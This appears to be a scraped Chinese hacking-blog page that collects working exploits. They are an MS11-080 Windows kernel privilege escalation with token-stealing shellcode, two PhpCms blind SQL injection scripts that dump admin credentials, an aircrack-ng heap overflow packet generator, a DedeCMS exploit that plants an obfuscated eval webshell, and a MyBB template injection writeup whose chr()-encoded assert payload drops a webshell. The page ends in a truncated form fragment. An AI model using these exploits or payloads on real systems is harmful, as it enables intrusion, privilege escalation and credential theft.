/*

* MS11-080 Afd.sys Privilege Escalation Exploit

* 来源：Matteo Memelli，[url]http://www.exploit-db.com/exploits/18176/[/url]

* 改编：KiDebug，[email]Google@pku.edu.cn[/email]

* 编译：VC6.0

* 测试环境：原版Windows XP SP3，Windows 2003 SP2，普通用户

*/

#include <stdio.h>

#include <Winsock2.h>

#include <winbase.h>

#include <windows.h>

#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {

HANDLE Section; // Not filled in

PVOID MappedBase;

PVOID ImageBase;

ULONG ImageSize;

ULONG Flags;

USHORT LoadOrderIndex;

USHORT InitOrderIndex;

USHORT LoadCount;

USHORT OffsetToFileName;

UCHAR FullPathName[ 256 ];

} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {

ULONG NumberOfModules;

RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];

} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );

typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );

typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );

NtQueryIntervalProfile_ NtQueryIntervalProfile;

NtAllocateVirtualMemory_ NtAllocateVirtualMemory;

NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()

{

__asm

{

pushad

pushfd

mov esi,PsReferencePrimaryToken

FindTokenOffset:

lodsb

cmp al, 8Dh;

jnz FindTokenOffset

mov edi,[esi+1]

mov esi,PsInitialSystemProcess

mov esi,[esi]

push fs:[124h]

mov eax,PsGetThreadProcess

call eax

add esi, edi

add edi, eax

movsd

popfd

popad

ret

}

}

void main(int argc, char **argv)

{

if (argc != 3)

{

printf("--------------------------------------\n");

printf("Usage : ms11-080.exe cmd.exe Command \n");

exit(-1);

}

HMODULE ntdll = GetModuleHandle( "ntdll.dll" );

NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );

NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );

NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );

if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )

return;

ULONG BaseAddress = 1 , RegionSize = 0x1000, status;

status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );

if ( status )

return;

//取ntoskrnl的信息，只要调用一次就行

ULONG NtoskrnlBase;

RTL_PROCESS_MODULES module;

status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11

if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH

return;

NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;

//把ntoskrnl.exe加载进来

HMODULE ntoskrnl;

ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );

if ( ntoskrnl == NULL )

return;

//计算实际地址

WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址

PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;

PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

//以下代码就各显神通了

if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )

return;

memset((PVOID)0x02070000,0x90,0x20000);

memcpy((PVOID)0x02080000,ShellCode,100);

WSADATA ws;

SOCKET tcp_socket;

struct sockaddr_in peer;

ULONG dwReturnSize;

WSAStartup(0x0202,&ws);

peer.sin_family = AF_INET;

peer.sin_port = htons(4455);

peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )

{

//printf("connect error\n");

}

UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";

memset((PVOID)0x1000,0x45,0x108);

memcpy((PVOID)0x1000,buf1,25);

if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))

{

//printf("error=%d\n", GetLastError());

}

//触发，弹出SYSTEM的CMD

NtQueryIntervalProfile( 2, &status );

printf("[>] ms11-080 Exploit\n");

printf("[>] by:Mer4en7y@90sec.org\n");

SECURITY_ATTRIBUTES sa;

HANDLE hWrite,hRead;

STARTUPINFO si;

PROCESS_INFORMATION pi;

char buf[4096];

DWORD dwReadBytes;

char lpcmd[256]={0};

ZeroMemory(buf,4096);

sa.bInheritHandle = TRUE;

sa.lpSecurityDescriptor = NULL;

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

if(!CreatePipe(&hRead,&hWrite,&sa,0))

{

printf("[>] create pipe error\n");

}

si.cb = sizeof(STARTUPINFO);

GetStartupInfo(&si);

si.hStdError = hWrite;

si.hStdOutput = hWrite;

si.wShowWindow = SW_HIDE;

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

strcat(lpcmd,"/c ");

strcat(lpcmd,argv[2]);

if(!CreateProcess(argv[1],lpcmd,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi))

{

printf("[>] create porcess error\n");

}

CloseHandle(hWrite);

while(dwReadBytes!=0)

{

WriteFile(hWrite,"test1",6,&dwReadBytes,NULL);

ZeroMemory(buf,4096);

ReadFile(hRead,buf,4096,&dwReadBytes,NULL);

printf("%s\n",buf);

}

return;

}

随机日志

• 2008年11月18日 -- 身体不是爱情的中转站
• 2009年08月21日 -- Aircrack-ng的windows版本，提供下载
• 2009年09月24日 -- 深圳大学2009届校长章必功毕业致辞
• 2008年10月30日 -- ASPXshell MS08-067插件
• 2006年11月18日 -- Discuz! 4.x SQL injection / admin exploit
• 2009年12月6日 -- SQL通用防注入程序 20091206版
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2007年12月17日 -- 伪装成Google Bot突破网站关键页面
• 2008年10月11日 -- nlite中文版帮你集成各类软件和补丁到Windows安装光盘（三）
• 2009年07月28日 -- 王涛离职，阿里软件名存实亡

下载：
kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images

相关文章

• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2009年09月1日 -- Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• 2009年05月17日 -- Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
• 2008年11月2日 -- Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧

相关文章

• 2011年06月4日 -- 也谈Nginx的CGI PATH INFO问题
• 2011年06月4日 -- Nginx https 免费SSL证书配置指南
• 2011年06月3日 -- nginx下wp super cache 设置
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2010年04月30日 -- nginx 目录自动加斜线
• 2009年09月20日 -- nginx代理DNS缓存域欺骗漏洞
• 2009年08月24日 -- nginx 0.7不cache动态文件的方法
• 2009年08月24日 -- nginx做cache
• 2009年08月18日 -- nginx 0.8.9

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

相关文章

• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675
• 2010年04月14日 -- SFX-SQLi SQL2005/2008注入工具

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

相关文章

• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年04月15日 -- Remote Exploit Against the Aircrack-NG Tools svn r1675
• 2010年04月14日 -- SFX-SQLi SQL2005/2008注入工具

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the

self-proclaimed length of a EAPOL-packet to be correct and never to exceed

a (arbitrary) maximum size of 256 bytes for packets that are part of the

EAPOL-authentication. We can exploit this by letting the code parse packets

which:

a) proclaim to be larger than they really are, possibly causing the code

to read from invalid memory locations while copying the packet;

b) really do exceed the maximum size allowed and overflow data structures

allocated on the heap, overwriting libc's allocation-related

structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-

path. Careful layout of the packet's content can even possibly alter the

instruction-flow through the already well known heap-corruption paths

in libc. Playing with the proclaimed length of the EAPOL-packet and the

size and content of the packet's padding immediately end up in various

assertion errors during calls to free(). This reveals the possibility to

gain control over $EIP.

Given that we have plenty of room for payload and that the tools are

usually executed with root-privileges, we should be able to have a

single-packet-own-everything exploit at our hands. As the attacker can

cause the various tools to do memory-allocations at his will (through

faking the appearance of previously unknown clients), the resulting

exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev

r238 to work. It generates pcap-file with single packet of the following

content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0

108000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172

3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com

'''

import cpyrit.pckttools

import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second

# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-

# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and

# struct WPA_hdsk.

# We have plenty of room for exploit-payload as most of the fields in the

# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent

# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in

# case of airodump-ng...

pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \

addr2='00:de:ad:c0:de:01', \

FCfield='to-DS') \

/ scapy.layers.dot11.LLC() \

/ scapy.layers.dot11.SNAP() \

/ scapy.layers.l2.EAPOL(len=65000) \

/ cpyrit.pckttools.EAPOL_Key() \

/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \

/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':

print "Packet's content:"

print ''.join("%02X" % ord(c) for c in str(pckt))

filename = 'aircrackng_exploit.cap'

print "Writing to '%s'" % filename

writer = cpyrit.pckttools.Dot11PacketWriter(filename)

writer.write(pckt)

writer.close()

print 'Done'

相关文章

• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2010年08月26日 -- PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年01月7日 -- discuz!7.1、7.2远程代码执行漏洞exploit
• 2009年09月22日 -- Gnuboard 0day&Exp
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit
• 2009年09月20日 -- Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版
• 2009年09月4日 -- Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

<?php

print_r('

+----------------------------------------+

dedecms v5.5 final getwebshell exploit

+----------------------------------------+

');

if ($argc < 3) {

print_r('

+----------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to dedecms

Example:

php '.$argv[0].' localhost /dedecms/

+----------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)

.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)

.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)

.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)

.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)

.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)

.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)

.chr(93).chr(41).chr(59).chr(63).chr(62));/*';

$post_b = 'needCode=aa/../../../data/mysql_error_trace';

$shell = 'data/cache/t.php';

get_send($post_a);

post_send('plus/comments_frame.php',$post_b);

$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){

echo "\nShell Address is:".$host.$path.$shell;

}else{

echo "\nError.";

}

function get_send($url){

global $host, $path;

$message = "GET ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

function post_send($url,$cmd){

global $host, $path;

$message = "POST ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

?>

相关文章

• 2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞
• 2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day
• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀
• 2010年04月1日 -- PDF最新0day
• 2010年03月24日 -- Firefox 3.6 0day被补了
• 2010年01月31日 -- 瑞星本地提权通杀利用代码
• 2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告
• 2009年09月22日 -- Gnuboard 0day&Exp
• 2009年09月22日 -- 新云4.0最新0day

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数，注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制，继续找到templates类查看get函数的定义:

//inc/class_templates.php,65行左右

function get($title, $eslashes=1, $htmlcomments=1)
{
global $db, $theme, $mybb;

//
// DEVELOPMENT MODE
//
if($mybb->dev_mode == 1)
{
$template = $this->dev_get($title);
if($template !== false)
{
$this->cache[$title] = $template;
}
}

if(!isset($this->cache[$title]))
{
$query = $db->simple_select("templates", "template", "title='".$db->escape_string($title)."' AND sid IN ('-2','-1','".$theme['templateset']."')", array('order_by' => 'sid', 'order_dir' => 'DESC', 'limit' => 1));
//从数据库里面的取出模版的代码
$gettemplate = $db->fetch_array($query);
if($mybb->debug_mode)
{
$this->uncached_templates[$title] = $title;
}

if(!$gettemplate)
{
$gettemplate['template'] = "";
}

$this->cache[$title] = $gettemplate['template'];
}
$template = $this->cache[$title];

if($htmlcomments)
{
if($mybb->settings['tplhtmlcomments'] == 1)
{
$template = "n{$template}n";
}
else
{
$template = "n{$template}n";
}
}

if($eslashes)
{
$template = str_replace("'", "'", addslashes($template));
}
return $template;
}

从上面的代码可以看出，get()函数是从数据库里面取出模板的内容经过处理后返回给eval函数。继续来跟以下，
看看数据库里面的数据是如何来的:

//admin/modules/style/templates.php,372行开始

if($mybb->input['action'] == "edit_template")
{
$plugins->run_hooks("admin_style_templates_edit_template");

if(!$mybb->input['title'] || !$sid)
{
flash_message($lang->error_missing_input, 'error');
admin_redirect("index.php?module=style/templates");
}

if($mybb->request_method == "post")
{
if(empty($mybb->input['title']))
{
$errors[] = $lang->error_missing_title;
}

if(!$errors)
{
$query = $db->simple_select("templates", "*", "tid='{$mybb->input['tid']}'");
$template = $db->fetch_array($query);
//获取到我们输入的内容，包括模板的标题和内容
$template_array = array(
'title' => $db->escape_string($mybb->input['title']),
'sid' => $sid,
'template' => $db->escape_string(trim($mybb->input['template'])),
'version' => $mybb->version_code,
'status' => '',
'dateline' => TIME_NOW
);

// Make sure we have the correct tid associated with this template. If the user double submits then the tid could originally be the master template tid, but because the form is sumbitted again, the tid doesn't get updated to the new modified template one. This then causes the master template to be overwritten
$query = $db->simple_select("templates", "tid", "title='".$db->escape_string($template['title'])."' AND (sid = '-2' OR sid = '{$template['sid']}')", array('order_by' => 'sid', 'order_dir' => 'desc', 'limit' => 1));
$template['tid'] = $db->fetch_field($query, "tid");

if($sid > 0)
{
// Check to see if it's never been edited before (i.e. master) of if this a new template (i.e. we've renamed it) or if it's a custom template
$query = $db->simple_select("templates", "sid", "title='".$db->escape_string($mybb->input['title'])."' AND (sid = '-2' OR sid = '{$sid}' OR sid='{$template['sid']}')", array('order_by' => 'sid', 'order_dir' => 'desc'));
$existing_sid = $db->fetch_field($query, "sid");
$existing_rows = $db->num_rows($query);
//更新模版数据库
if(($existing_sid == -2 && $existing_rows == 1) || $existing_rows == 0)
{
$tid = $db->insert_query("templates", $template_array);
}
else
{
$db->update_query("templates", $template_array, "tid='{$template['tid']}' AND sid != '-2'");
}
}

从以上的代码可以发现，这是一个典型的“二次”漏洞.我们在后台将php代码通过编辑模板注入到数据库，然后到访问前台文件取出代码进入eval函数成功执行代码，注入代码的时候要规避一些敏感符号。比较遗憾的是这个漏洞需要管理员权限才能利用，仅能作为后台getwebshell的方法。

[二]漏洞利用：

在后台 Home -> Template Sets -> Default Templates 选择Edit Template: index
在{$headerinclude}下写入如下一段代码后保存:

{${assert(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).
chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).
chr(39).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).
chr(102).chr(108).chr(121).chr(104).chr(52).chr(116).
chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).
chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).
chr(60).chr(63).chr(112).chr(104).chr(112).
chr(32).chr(64).chr(36).chr(95).chr(80).chr(79)
.chr(83).chr(84).chr(91).chr(119).chr(93).chr(40)
.chr(36).chr(95).chr(80).chr(79).chr(83).chr(84)
.chr(91).chr(102).chr(93).chr(41).chr(63).
chr(62).chr(39).chr(41).chr(59))}}

访问首页后将在cache目录下生成flyh4t.php，内容为，可以使用客户端连接。

随机日志

• 2009年07月28日 -- SQL语句导入导出大全
• 2009年12月11日 -- 【转载】我和老公的那些害羞事儿
• 2006年12月11日 -- 超级多韩国高清晰MV集合 需要eMule下载
• 2009年01月24日 -- VMware漏洞实例分析之一 – 共享文件夹目录遍历漏洞
• 2007年03月13日 -- 入侵日本某官方Game
• 2006年11月26日 -- DB_ONER权限日志备分专用一句话木马
• 2011年11月24日 -- 几个在线密码破解网站的比较
• 2006年09月23日 -- 在韩中国留学生对韩国的真实评价
• 2009年12月2日 -- 迪拜地产废墟下掩埋了多少温州资本家
• 2008年11月23日 -- windows系统目录环境变量大全(目录简写)

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

